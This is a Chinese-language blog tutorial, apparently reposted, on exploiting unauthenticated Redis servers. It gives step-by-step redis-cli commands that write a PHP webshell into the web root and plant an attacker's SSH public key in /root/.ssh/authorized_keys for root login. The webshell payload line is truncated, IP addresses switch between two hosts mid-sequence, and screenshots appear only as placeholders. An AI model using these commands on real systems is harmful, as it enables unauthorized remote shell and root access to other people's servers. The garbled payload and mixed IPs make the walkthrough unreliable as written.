Redis未授权访问漏洞的利用

web渗透学习交流群:811401950

利用redis写webshell
在redis-cli中写入以下命令:
config set dir /var/www/html/

config set dbfilename redis.php

set webshell “
save
Redis未授权访问漏洞的利用_第1张图片
然后看一下目录下是否生成了一个redis.php的文件
在这里插入图片描述
可以看到生成了,查看一下文件的内容
在这里插入图片描述
在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell
Redis未授权访问漏洞的利用_第2张图片
Redis 未授权访问配合 SSH key 文件利用
首先在攻击机生成密匙:ssh-keygen –t rsa
Redis未授权访问漏洞的利用_第3张图片
看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容
Redis未授权访问漏洞的利用_第4张图片
然后将公钥写入key.txt中
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt
Redis未授权访问漏洞的利用_第5张图片
然后连接redis进行写入
$ cat key.txt | redis-cli -h 192.168.136.133 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.136.133:6379> config set dir /root/.ssh/
$ 192.168.1.11:6379> config set dbfilename “authorized_keys”
$ 192.168.1.11:6379> save
Redis未授权访问漏洞的利用_第6张图片
然后去目标机看一下是否生成
Redis未授权访问漏洞的利用_第7张图片
然后回到攻击机,利用自己的密钥进行ssh登录:
ssh –i id_rsa [email protected]
在这里插入图片描述

你可能感兴趣的:(web,渗透,web渗透)